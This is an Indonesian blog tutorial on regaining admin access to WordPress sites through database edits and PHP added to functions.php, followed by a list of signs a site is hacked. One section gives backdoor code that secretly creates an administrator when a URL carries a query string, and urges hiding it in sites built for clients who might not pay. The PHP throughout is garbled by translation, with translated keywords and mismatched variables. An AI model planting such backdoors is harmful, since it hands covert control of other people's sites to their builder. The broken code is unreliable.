Cara Meretas Ke Situs Web WordPress dan Mendapatkan Kembali Akses

Kami tidak memaafkan, menyetujui, atau mendorong perilaku ilegal atau jahat apa pun! Tujuan artikel ini adalah untuk menjelaskan cara meretas atau mendapatkan kembali akses ke situs WordPress milik Anda, atau bahwa Anda memiliki hak untuk mengedit, mengelola, dan mengakses. Apa pun yang Anda lakukan, Anda melakukannya sendiri. 

Metode yang dijelaskan akan membantu Anda mendapatkan kembali akses ke situs bahkan jika Anda tidak lagi memiliki akun, tetapi memerlukan beberapa info tentang situs tersebut dan metode tersebut tidak akan membantu Anda meretas instalasi WordPress acak apa pun.

Cara meretas situs web WordPress, panduan lengkap

Situasi yang dapat Anda bantu sendiri

Jika Anda berada dalam salah satu situasi berikut, metode kami akan membantu Anda mendapatkan kembali akses:

  • Anda lupa nama pengguna atau alamat email
  • opsi atur ulang kata sandi tidak berfungsi di  server hosting
  • email setel ulang kata sandi tidak masuk
  • Anda tidak lagi memiliki akses ke alamat email akun
  • Anda tahu nama pengguna & kata sandi, tetapi kombinasinya tidak berfungsi

Untuk menggunakan metode yang dijelaskan di bawah ini, Anda  hanya memerlukan salah satu dari berikut ini :

  • Akses FTP ke server, atau
  • akses cPanel ke server, atau
  • akses ke database MySQL dan kemampuan untuk terhubung dari jarak jauh

Metode #1 – cara MySQL

Gunakan metode ini untuk mengubah kata sandi (atau nama pengguna jika diperlukan) dari pengguna yang sudah ada atau untuk membuat akun baru. Anda memerlukan akses cPanel atau akses MySQL langsung ke database situs. Mari kita mulai dengan mengubah kata sandi pengguna yang ada .

Jika Anda menggunakan cPanel, login (cPanel selalu dapat diakses melalui  https://yoursite.com:2083 tautan), temukan dan buka phpMyAdmin. Daftar database dan tabel ada di sebelah kiri . Anda sedang mencari tabel yang diakhiri dengan  _users. Itu mungkin  wp_users, tetapi jika Anda memiliki lebih dari satu situs WordPress yang terinstal di server, Anda harus menemukan situs yang tepat.

Tabel yang tepat akan memiliki pengguna yang ingin Anda edit di dalamnya. Ikuti prosedur yang sama jika Anda terhubung ke MySQL melalui beberapa klien eksternal seperti SQLyog. Setelah Anda menemukan tabel dan catatan pengguna yang sebenarnya, saatnya untuk mengubah kata sandi.

Seperti yang mungkin sudah Anda ketahui sekarang, kata sandi disimpan di  user_pass lapangan, di-hash menggunakan algoritme MD5. Buka generator MD5 online masukkan kata sandi yang ingin Anda gunakan dan klik "Hash". Salin string yang dihasilkan dan ganti kata sandi asli dengannya. Di phpMyAdmin, Anda dapat mengedit bidang dengan mengklik dua kali. Prosedurnya mirip dengan klien MySQL lainnya. Simpan perubahan dan masuk ke WordPress dengan kata sandi baru Anda.

Tabel pengguna WP
Nama pengguna, kata sandi yang di-hash, dan email disimpan di  wp_users tabel database

Masih di metode #1 – membuat pengguna baru

Membuat pengguna baru sedikit lebih rumit tetapi masih dapat dikelola dalam waktu kurang dari satu menit. Buat catatan baru di tabel pengguna dan isi user_login, user_pass (hash, menggunakan fungsi MD5 yang dijelaskan di atas) dan user_email. Semua bidang lainnya boleh tetap kosong; mereka tidak penting. Simpan rekor baru. Setelah disimpan, MySQL akan memberinya ID unik. Ini adalah nomor di bidang ID. Ingat itu.

Sekarang pergi ke  _usermeta meja. Ingat, awalan tabel harus sama dengan awalan pengguna . Misalnya  wp_users dan  wp_usersmeta. Jika awalan tidak sama, Anda mengedit tabel yang salah (dari beberapa instalasi WP lainnya) dan akun baru tidak akan berfungsi. Kami akan membuat dua catatan baru. Abaikan  umeta_id bidang untuk keduanya. Setel  user_id bidang ke nilai yang baru saja Anda ingat (nilai ID baru di tabel pengguna). Untuk record pertama atur  meta_key ke  wpct_user_level dan  meta_value ke  10. Untuk yang kedua  meta_key ke  wpct_capabilities dan  meta_value ke  a:1:{s:13:"administrator";b:1;}. Simpan keduanya. Selesai – masuk!

Metode #2 – cara functions.php

Pendekatan ini dapat dimanfaatkan baik dengan mengedit functions.php melalui cPanel atau dengan menggunakan klien FTP untuk melakukannya. Jika menggunakan cPanel temukan File Manager dan buka. Pertama, kita harus menemukan folder tema yang aktif.

Pergi ke  public_html/wp_content/themes folder. Jika Anda segera melihat tema Anda dan tahu yang mana itu – bagus. Buka foldernya dan mulai mengedit  functions.php. Jika tidak, buka situsnya, klik kanan di mana saja, pilih "Lihat sumber". Kemudian tekan Ctrl + F dan mulai mengetik  /themes/ segera Anda akan memiliki banyak URL yang disorot, dan Anda akan mengenali nama folder dari tema aktif.

Temukan di struktur file, buka, dan mulai mengedit  functions.php. Salin/tempel kode berikut di akhir file. Pikirkan  ?> tag PHP penutup jika Anda memilikinya . Mereka harus berada di baris terakhir. Jadi, masukkan kode sebelum mereka.

$new_user_email = 'm email@domain.com ';
$new_user_password = '12345';

if(!username_exists($new_user_email)) {
  $user_id = wp_create_user($new_user_email,
$kata_pengguna_baru, $email_pengguna_baru);

  wp_update_user(array('ID' => $user_id, 'nickname'
=> $email_pengguna_baru));

  $pengguna = WP_User baru($user_id);
  $user->set_role('administrator');
}

Edit hanya dua baris pertama kode untuk mencerminkan akun baru Anda. Jika sudah ada pengguna di WP dengan email itu, akun baru tidak akan dibuat, jadi pastikan itu baru . Ubah kata sandi juga – jangan diretas oleh script kiddies. Setelah menyimpan file cukup buka situs Anda, kode akan dijalankan, akun baru dengan hak administrator dibuat dan Anda dapat masuk dengannya.

Setelah Anda melakukannya, ingatlah untuk menghapus kode dari  functions.php.

Metode peretasan lainnya

Dengan mengetahui kata sandi FTP, cPanel, atau MySQL, Anda membuktikan bahwa Anda memiliki hak akses yang sah ke server dan karenanya harus memiliki akses ke instalasi WordPress juga. Jika Anda tidak memiliki akun tersebut, maka Anda tidak berguna (meretas ke situs orang lain), dan itu tidak baik!

Jika Anda tidak punya waktu untuk menyiapkan blog , beri tahu kami agar kami dapat mencoba membantu.

Cara membuat pintu belakang di WordPress

Ketika pintu depan ditutup, Anda dapat mencoba pintu belakang. Ini mungkin terdengar seperti cara jahat menggunakan kode untuk memasuki situs tanpa memiliki akses ke sana, tetapi sebenarnya ada kalanya Anda perlu mengontrol situs Anda sendiri jika seseorang mencurinya.

Jika Anda membuat situs web untuk orang lain, sesuatu yang Anda lakukan, cepat atau lambat akan ada klien yang menolak membayar Anda untuk pekerjaan Anda; klien yang akan menghapus informasi login Anda dan mengambil alih kendali atas semua yang telah Anda lakukan. Terkadang, cukup membuat pengguna baru melalui FTP atau mengatur ulang kata sandi. Jika itu tidak cukup, Anda mungkin ingin meretas jalan kembali atau membuat akses pintu belakang ke halaman admin Anda.

Tetapi jika Anda memutuskan untuk menyembunyikan sebagian kecil kode di lingkungan WordPress Anda, Anda dapat menyelamatkan harga diri Anda dan mendapatkan akses ke situs WordPress dengan hak istimewa administrator . Dan disitulah permainan dimulai.

Tidak peduli berapa kali pencuri ini menghapus informasi Anda atau memulihkan cadangan di server yang mungkin dimilikinya, ada kemungkinan dia tidak tahu apa-apa tentang pintu masuk backdoor. Jika dia melakukannya, dia mungkin tidak membutuhkan bantuan Anda dalam menyiapkan WordPress, bukan?

Buat pintu belakang:

Oke, cukup dengan pembicaraannya; inilah sepotong kode yang Anda perlukan untuk menyelesaikan pekerjaan:

  1. Buka file functions.php
  2. Salin/Tempel kode berikut:
add_action('wp_head', 'wploop_backdoor');
fungsi wploop_backdoor() {
Jika ($_GET['pintu belakang'] == 'knockknock') {
membutuhkan('wp-includes/registration.php');
If (!username_exists('username')) {
$user_id = wp_create_user('nama', 'lulus');
$pengguna = WP_User baru($user_id);
$user->set_role('administrator');
}
}
}
?>
 
  1. Simpan perubahan

Jika Anda membiarkan kode apa adanya, yang harus Anda lakukan untuk membuat admin baru di situs adalah mengunjungi  http://www.yourdomain.com/?backdoor=knockknock .

Tentu saja, Anda dapat mengubahnya pada kode di atas dengan mengubah 'nama' dan 'pass' menjadi apa pun yang Anda inginkan. Anda juga dapat mengubah tautan ke pintu belakang Anda dengan mengubah 'pintu belakang' dan/atau 'knockknock' menjadi apa pun yang Anda pikirkan.

Cobalah fungsinya – tidak hanya menyenangkan tetapi juga dapat sangat membantu Anda suatu saat nanti ketika Anda akan  membuat situs web  untuk seseorang yang tidak dapat Anda percayai sepenuhnya. Anda juga harus meningkatkan keterampilan WordPress dan blogging Anda.

Cara membuat akun pengguna baru melalui FTP

Membuat akun pengguna baru di WordPress sangat mudah. Sebagai admin, Anda perlu membuka halaman admin Pengguna tempat Anda dapat membuat akun baru untuk peran pengguna apa pun. Itu dapat dilakukan dalam hitungan detik dan pengguna yang baru dibuat dapat langsung masuk dengan nama pengguna dan kata sandi yang diberikan.

Tetapi apa yang terjadi jika Anda kehilangan akses ke admin WordPress Anda? Segalanya mungkin menjadi sedikit lebih rumit, tetapi jangan khawatir – kami memiliki fungsi untuk Anda yang dapat menyelamatkan hidup admin Anda.

Apakah admin lain menghapus akun Anda, apakah Anda telah menghapus semua pengguna dari database secara tidak sengaja, menggunakan plugin yang tidak berfungsi, atau diretas, Anda tetap dapat memegang kendali kembali. Kadang-kadang Anda mungkin bisa mendapatkan akses hanya ke server FTP Anda sementara server HTTP berada di luar jangkauan Anda dan Anda perlu membuat admin baru. Meskipun itu mungkin kasus yang jarang terjadi, fungsi berikut akan menyelamatkan Anda.

Untuk membuat akun baru di luar lingkungan admin WordPress, yang Anda perlukan hanyalah akses FTP ke situs Anda. Sebagai admin, Anda harus memiliki semua informasi yang diperlukan untuk masuk ke server Anda dan Anda dapat dengan cepat membuat akun baru dengan membuat fungsi baru di tema Anda.

Buat akun pengguna baru melalui FTP:

  1. Buka klien FTP dan sambungkan ke akun Anda
  2. Arahkan ke wp-content/themes
  3. Buka folder tema yang Anda gunakan
  4. Cari file functions.php dan edit
  5. Salin dan tempel fungsi berikut:
fungsi admin_account(){
$pengguna = 'Nama Pengguna';
$pass = 'Password';
$email = ' email@domain.com ';
jika ( !username_exists( $user ) && !email_exists(
$email ) ) {
$user_id = wp_create_user( $user, $pass, $email );
$pengguna = WP_User baru( $pengguna_id );
$user->set_role( 'administrator' );
} }
add_action('init','admin_account');
 
  1. Ubah nama pengguna, kata sandi, dan email menjadi sesuatu yang unik
  2. Simpan perubahan

Pastikan nama pengguna, kata sandi, dan alamat email yang Anda atur dalam fungsi itu unik atau jika tidak, fungsi tersebut tidak akan berfungsi dengan baik. Setelah Anda menyimpan perubahan, Anda selesai dan Anda dapat menavigasi ke panel login WP Anda. Gunakan informasi baru untuk masuk kembali dan setelah Anda memverifikasi akun, Anda dapat menghapus fungsi dari file functions.php.

Fungsi yang ditunjukkan di atas membuat akun admin tetapi Anda dapat dengan mudah memodifikasinya untuk membuat akun dengan peran pengguna lainnya. Cukup ubah peran pada  baris ke- 8 kode menjadi editor, penulis, kontributor, pelanggan, atau peran pengguna lainnya yang telah Anda buat.

Sayangnya, jika Anda kehilangan akun admin, Anda juga kehilangan semua postingan yang ditulis dengan nama pengguna tersebut. Itu sebabnya Anda harus selalu menyimpan cadangan yang dapat diambil dengan mudah. Jika Anda membaca ini sambil memiliki akun admin, anggap ini sebagai pengingat untuk segera membuat cadangan dan tandai artikel ini untuk berjaga-jaga jika Anda perlu membuat akun di luar WordPress di masa mendatang.

10 tanda situs WordPress Anda diretas

WordPress adalah platform blogging yang sangat besar . Ada jutaan pengguna dan tampaknya jumlahnya berkembang pesat setiap hari. Orang-orang bahkan cenderung mentransfer situs web mereka yang dibuat di sistem manajemen konten lain ke sistem sumber terbuka ini lebih sering daripada yang Anda kira. Dan, meskipun ini bagus, ini berarti peretas juga akan menempatkan WordPress di posisi nomor satu saat mencoba menyerang situs acak.

Biasanya, jika Anda diretas, Anda akan langsung mengetahuinya. Situs Anda tidak akan dapat diakses; Anda tidak akan bisa masuk dan terkadang peretas bahkan meninggalkan pesan di halaman depan. Tetapi lebih sering daripada tidak, Anda bahkan mungkin tidak menyadari bahwa ada sesuatu yang berubah . Di bagian artikel ini, kami akan menunjukkan kepada Anda beberapa tanda yang mungkin menunjukkan bahwa situs WordPress Anda diretas dan beberapa solusi untuk masalah tersebut.

1. Gagal masuk

Tanda ini cukup jelas. Jika Anda telah menggunakan kombinasi nama pengguna dan kata sandi untuk sementara waktu tanpa pernah mengalami masalah, Anda mungkin curiga jika tiba-tiba WordPress tidak mengenali akun Anda. Jika seorang peretas masuk ke situs Anda, kemungkinan besar dia akan segera mengubah hak admin Anda .

Mungkin dia harus mengubah kata sandi Anda atau menghapus akun Anda sepenuhnya. Sebelum Anda mulai panik setelah pertama kali WordPress mengirimi Anda pesan tentang nama pengguna/kata sandi yang salah, pertimbangkan fakta bahwa Anda mungkin telah memasukkan kombinasi yang salah atau Anda mungkin telah mengaktifkan tombol caps lock.

Solusi : Coba pulihkan kata sandi melalui email atau gunakan akun lain untuk masuk kembali. Untuk memastikan login Anda tetap aman, kami sarankan untuk menginstal Masuk Ninja plugin untuk WordPress.

2. Konten berbahaya ditambahkan ke situs Anda

Situs berisi peringatan malware

Jika Anda mulai memperhatikan konten asing di situs Anda, Anda mungkin mulai khawatir. Saat mereka mendapat kesempatan untuk mengakses area admin Anda, peretas akan dapat mengubah inti Anda serta file tema dan plugin Anda . Itu berarti bahwa mereka dapat mengubah apa pun yang mereka inginkan.

Sementara beberapa peretas akan secara drastis mengubah tampilan situs Anda dan bahkan mungkin menyatakan bahwa Anda telah diretas, yang lain akan jauh lebih halus tentang hal itu.

Solusi : Coba cari hidden content di kode website. Mungkin ada tautan ke situs jahat yang ditanam peretas di footer situs Anda, atau mereka mungkin telah memasang munculan yang akan terbuka secara rutin untuk pelanggan Anda. Gunakan Security Ninja untuk memindai situs Anda atau terus memantau situs Anda untuk masalah tersebut.

3. Kunjungan mencurigakan

Jika Anda tidak melacak situs web Anda, Anda harus segera melakukannya. Cara sederhana untuk melakukannya adalah menggunakan Google Analytics yang, di antara banyak fitur lainnya, dapat memberi tahu Anda berapa banyak kunjungan yang Anda dapatkan dan dari mana asal kunjungan tersebut. Setelah beberapa waktu, Anda akan mengetahui situs web Anda. Itu berarti Anda akan tahu dari mana datangnya kunjungan, Anda akan tahu kapan Anda meluncurkan kampanye baru dan kapan ada tautan promosi baru yang dirilis secara liar.

Namun jika Anda tiba-tiba menyadari bahwa situs Anda mendapatkan banyak sekali kunjungan baru dari domain yang mencurigakan , Anda sebaiknya menyelidikinya lebih lanjut karena situs Anda mungkin saja diretas. Biasanya, kunjungan semacam itu akan menghasilkan rasio pentalan 100% yang artinya hanya satu halaman yang diakses. Peretas akan sering menggunakan sistem otomatis yang akan mengarahkan situs jahat lainnya ke situs Anda. Apakah itu kode buruk yang dieksekusi di situs Anda atau Anda telah menjadi bagian dari jaringan spamming, semuanya bisa menjadi serius, dan Anda harus memeriksa situs Anda untuk mencari kode berbahaya.

Solusi: Gunakan Alat Webmaster Google untuk menemukan domain yang mencurigakan.

4. Tiba-tiba terjadi penurunan lalu lintas

Status situs penjelajahan aman

Berbeda dengan tanda yang disebutkan terakhir tentang diretas, yang ini mungkin mengingatkan Anda karena tiba-tiba ada penurunan jumlah kunjungan. Alih-alih mengarahkan kunjungan baru kepada Anda, peretas mungkin mengirimkan kunjungan dari situs Anda . Ini mungkin terjadi karena peretas mengalihkan situs Anda ke situs lain. Alasan lain untuk mendapatkan lebih sedikit pengunjung adalah karena Google memasukkan situs Anda ke dalam daftar hitam. Tindakan ini akan menampilkan pesan kepada setiap pengguna yang mungkin memilih untuk tidak membuka situs Anda karena terinfeksi.

Solusi : Gunakan Google Status Situs Penjelajahan Aman untuk memeriksa apakah situs Anda ditandai sebagai tidak aman dan saat ini berbahaya untuk dikunjungi.

5. Hasil mesin pencari aneh

Jika Anda tidak melihat adanya perubahan pada situs Anda, tetapi Anda menemukan bahwa hasil penelusuran di Google dan mesin telusur lainnya aneh (menampilkan judul yang berbeda dan meta-data lainnya), ini mungkin merupakan tanda yang jelas bahwa situs telah diretas. Seorang peretas mungkin telah mengubah konten Anda dengan cara yang hanya dapat dilihat oleh seorang ahli. Tetap saja, perubahan itu akan terlihat di hasil mesin pencari.

Solusi : Periksa situs Anda dengan Alat Webmaster Google, dan periksa apakah situs Anda diretas dengan ini alat daring gratis.

6. Anda tidak dapat mengirim/menerima email

Setelah peretas mendapat akses ke situs Anda, dia mungkin ingin menggunakan server Anda untuk mengirim spam ke orang lain . Ketika Anda mengetahui bahwa Anda tidak dapat mengirim atau menerima email baru dari WordPress Anda, ini bisa menjadi tanda yang jelas bahwa Anda telah diretas. Periksa email Anda sekali lagi, lalu periksa dengan penyedia Anda untuk memastikan tidak ada kesalahan.

Solusi : Uji WordPress Anda fungsi surat dengan plugin gratis ini.

7. Situs tidak ada

Server tidak ditemukan

Ada kalanya peretas tidak akan mengakses situs Anda untuk memasukkan kode berbahaya, mengalihkan pengguna, atau menggunakan email Anda untuk spam. Terkadang, yang ingin mereka lakukan hanyalah merusak situs Anda . Jarang, seorang peretas berhasil menghapus semuanya dari seluruh server. Itulah mengapa penting bagi Anda untuk menyimpan file Anda di aperusahaan hosting ternamayang akan menjaga keamanan dan juga menyimpan cadangan harian atau setidaknya mingguan dari situs web Anda. Sebaiknya Anda juga melakukan pencadangan sendiri dari waktu ke waktu agar situs dapat dipulihkan dengan cepat.

Solusi : Instal salah satu plugin terbaik untuk manajemen cadangan di WordPress.

8. File mencurigakan

Mirip dengan konten berbahaya yang dapat ditambahkan ke file yang ada, peretas mungkin menanam file tambahan di mana saja di dalam folder root Anda . Adalah hal yang baik untuk mengetahui cara Anda menggunakan WordPress, tetapi jika Anda tidak begitu berpengalaman, Anda harus memiliki alat keamanan yang dapat memeriksa semua file dan aktivitas Anda. Baru-baru ini, kami meninjau Ninja Keamanan yang merupakan alat sempurna untuk memeriksa semua file WordPress Anda.

Solusi : Coba cari file yang bukan milik instalasi WordPress Anda. Gunakan Security Ninja untuk memindai situs Anda secara teratur dan menemukan file tersebut secara otomatis. Kemudian hapus file atau hapus kode berbahaya dari file yang terinfeksi. Jangan lupa add-on Core Scanner untuk Security Ninja.

9. Anggota baru

Bergantung pada situs Anda, Anda mungkin satu-satunya yang dapat menambahkan anggota baru. Jika demikian, email yang memberi tahu Anda tentang pengguna yang baru terdaftar dapat memicu alarm. Jika ada admin lain yang memiliki kemampuan untuk menambah anggota baru, tanyakan kepada mereka tentang aktivitas yang mencurigakan.

Solusi : Ubah URL login dengan plugin gratis, batasi akses ke halaman login WordPress Anda dengan menggunakan file .htpasswd dan gunakan Login Ninja untuk melindungi form login Anda setiap saat.

10. Lihat acara terjadwal di server Anda

Terkadang, seorang peretas tidak akan melakukan apa pun ke situs web Anda begitu mereka menemukan jalan masuk. Sebaliknya, mereka akan meninggalkan acara terjadwal yang dapat membahayakan situs Anda di masa mendatang. Teknik ini berbahaya karena seorang peretas dapat membuat korban yang tidak berpengalaman tidak tahu apa-apa pada awalnya. Anda mungkin terinfeksi dan tidak tahu apa-apa tentang itu.

Solusi : Periksa pekerjaan CRON Anda di server yang Anda gunakan dan pastikan tidak ada tugas terjadwal yang mencurigakan.

Membungkus

Kami berharap artikel ini akan membantu Anda mengelola bahkan situs WordPress yang lebih aman dan membantu Anda mendapatkan kembali akses ke sana dalam situasi yang buruk. Dan bahkan jika situs Anda bersih, jangan anggap remeh . Selalu pastikan bahwa blog Anda seaman mungkin. Kami menyarankan plugin keamanan untuk WordPress yang dapat menghemat waktu Anda. Tetap saja, jangan menjadi orang yang menggunakan kata sandi yang tidak aman, dan berhati-hatilah saat meretas situs WordPress Anda sendiri.

Posting Komentar untuk "Cara Meretas Ke Situs Web WordPress dan Mendapatkan Kembali Akses"